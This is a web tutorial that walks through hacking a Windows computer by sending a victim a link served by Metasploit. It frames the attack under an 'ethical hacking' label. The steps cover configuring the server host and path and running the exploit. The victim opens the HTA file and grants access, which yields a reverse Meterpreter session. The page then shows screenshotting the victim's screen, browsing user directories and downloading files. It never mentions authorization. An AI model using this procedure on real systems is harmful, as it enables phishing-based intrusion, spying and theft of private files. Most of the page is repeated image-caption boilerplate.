Kali Linux Tutorials - Metasploit - Hack Windows by Sending Link



What is Windows OS ?

  • Windows OS was developed by Microsoft, And to overcome the limitation of its own MS-DOS.
  • Microsoft introduced an OS named Windows on November 20, 1985.
  • Windows written in C, C++, Assembly
  • During the year 1990, the 1st successful version were windows 3.0
  • The other versions were subsequently released. They are mentioned below:
    • Windows 98
    • Windows 2000
    • Windows XP
    • Windows Vista
    • Windows 7
    • Windows 8
    • Latest Windows 10

What is Metasploit ?

  • It is an open source exploitation and its not a single tool but collection of many.
  • It is mostly used for the following,
    • Penetration Testing
    • Research
    • Creating and
    • Testing new exploits.
  • Providence of infrastructure to automate complex tasks.
  • Basic terminologies are vulnerability (system weakness and bug which is to be exploited), exploit (small code to take advantage of a vulnerability), payload (another code that is executed through given exploit). This tool comes under the Ethical hacking tutorial.

Alternatives of Metasploit:

Nessus

  • The tool is used for vulnerability scanning, which is the world-leader in active scanners.
  • Features are mentioned below:
    • High-speed discovery,
    • Configuration auditing,
    • Asset profiling.

Learn Ethical Hacking - Ethical Hacking tutorial - - Ethical Hacking examples - Ethical Hacking programs

Cobalt Strike

  • It is a threat emulation software.
  • It is used to demonstrate the risk of a breach.
 Cobalt Strike

Learn Ethical Hacking - Ethical Hacking tutorial - Cobalt Strike - Ethical Hacking examples - Ethical Hacking programs

Zoomeye

  • It is a search engine for Cyberspace and developed by Knownsec Inc.
  • The first version of zoomeye was released on 1st july 2013.
  • It uses Xmap and Wmap at its core for grabbing data from publicaly exposed devices and web services.
 Zoomeye

Learn Ethical Hacking - Ethical Hacking tutorial - Zoomeye - Ethical Hacking examples - Ethical Hacking programs

Armitage

  • It is a graphical cyber attack management tool.
  • It will make penetration testing easily by adding a GUI to metasploit framework.
  • It is written in java.
 Armitage

Learn Ethical Hacking - Ethical Hacking tutorial - Armitage - Ethical Hacking examples - Ethical Hacking programs

How to hack windows using link ?

Step 1:

  • Install Metasploit frame work from browser.

Step 2:

  • Open your Metasploit-framework then type msfconsole
 MSF Console

Learn Ethical Hacking - Ethical Hacking tutorial - MSF Console - Ethical Hacking examples - Ethical Hacking programs

  • The output of msfconsole window.
 Ouptut of MSF Console

Learn Ethical Hacking - Ethical Hacking tutorial - Ouptut of MSF Console - Ethical Hacking examples - Ethical Hacking programs

Step 3:

  • Next type show options then hit enter.
 Show Options

Learn Ethical Hacking - Ethical Hacking tutorial - Show Options - Ethical Hacking examples - Ethical Hacking programs

  • The options are displayed here and change SRVHOST and URIPATH
 Change Host and Path

Learn Ethical Hacking - Ethical Hacking tutorial - Change Host and Path - Ethical Hacking examples - Ethical Hacking programs

Step 5:

  • Type set SRVHOST ( local/public ip address), set the URIPATH , set the target and hit enter. Finally, type exploit
  • Now you will get the link, copy that link and send to victim system
 Get Link

Learn Ethical Hacking - Ethical Hacking tutorial - Get Link - Ethical Hacking examples - Ethical Hacking programs

  • Victim will type that link in browser
 Link in Browser

Learn Ethical Hacking - Ethical Hacking tutorial - Link in Browser - Ethical Hacking examples - Ethical Hacking programs

  • The hta file will show.
 Hta File

Learn Ethical Hacking - Ethical Hacking tutorial - Hta File - Ethical Hacking examples - Ethical Hacking programs

  • When the victim will hit allow button, you will get the reverse connection.
 Click Allow to Get Reverse Connection

Learn Ethical Hacking - Ethical Hacking tutorial - Click Allow to Get Reverse Connection - Ethical Hacking examples - Ethical Hacking programs

Step 6:

  • Here meterpreter session1 will open then type sessions
 Meterpreter Session

Learn Ethical Hacking - Ethical Hacking tutorial - Meterpreter Session - Ethical Hacking examples - Ethical Hacking programs

Step 7:

  • Type sessions -i 1
 Session

Learn Ethical Hacking - Ethical Hacking tutorial - Session - Ethical Hacking examples - Ethical Hacking programs

  • Here meterpreter will connected.
 Meterpreter will Connected

Learn Ethical Hacking - Ethical Hacking tutorial - Meterpreter will Connected - Ethical Hacking examples - Ethical Hacking programs

Step 8:

  • Type help
 Type Help

Learn Ethical Hacking - Ethical Hacking tutorial - Type Help - Ethical Hacking examples - Ethical Hacking programs

  • Help commands are shown here.
 Help Commands

Learn Ethical Hacking - Ethical Hacking tutorial - Help Commands - Ethical Hacking examples - Ethical Hacking programs

Step 9:

  • Type sysinfo and the victim’s systems information is displayed.
 System Information

Learn Ethical Hacking - Ethical Hacking tutorial - System Information - Ethical Hacking examples - Ethical Hacking programs

Step 10:

  • Type screenshot command to take a screen shot of victim’s screen.
 Command for Screenshot

Learn Ethical Hacking - Ethical Hacking tutorial - Command for Screenshot - Ethical Hacking examples - Ethical Hacking programs

  • Here the screen shot is saved to the Metasploit-framework folder
 Screenshot

Learn Ethical Hacking - Ethical Hacking tutorial - Screenshot - Ethical Hacking examples - Ethical Hacking programs

Step 11:

  • Type cd / and then ls and this command will display the victim’s system Folders.
 Victim System Folder

Learn Ethical Hacking - Ethical Hacking tutorial - Victim System Folder - Ethical Hacking examples - Ethical Hacking programs

  • Here shows the victims file directories.
 Victim File Directory

Learn Ethical Hacking - Ethical Hacking tutorial - Victim File Directory - Ethical Hacking examples - Ethical Hacking programs

Step 12:

  • Type cd:\Users and then ls command to show victim’s system user directory.
 Victim System User Directory

Learn Ethical Hacking - Ethical Hacking tutorial - Victim System User Directory - Ethical Hacking examples - Ethical Hacking programs

Step 13:

  • Type cd (specific user directory) and type ls command.
 Specific User Directory

Learn Ethical Hacking - Ethical Hacking tutorial - Specific User Directory - Ethical Hacking examples - Ethical Hacking programs

Step 14:

  • Here the specific directory’s folder is displayed.
 Displayed Specific Directory

Learn Ethical Hacking - Ethical Hacking tutorial - Displayed Specific Directory - Ethical Hacking examples - Ethical Hacking programs

Step 15:

  • Type cd (specific) folder name and then type ls command to show the all files in to the specific folder
 Show All Files

Learn Ethical Hacking - Ethical Hacking tutorial - Show All Files - Ethical Hacking examples - Ethical Hacking programs

Step 16:

  • Type download (File name) and hit enter, then file will download.
 File Download

Learn Ethical Hacking - Ethical Hacking tutorial - File Download - Ethical Hacking examples - Ethical Hacking programs

Step 17:

  • Type exit command, to exit the meterpreter session
 Exit Meterpreter Session

Learn Ethical Hacking - Ethical Hacking tutorial - Exit Meterpreter Session - Ethical Hacking examples - Ethical Hacking programs

Step 18:



Related Searches to Metasploit | Hack Windows by Sending Link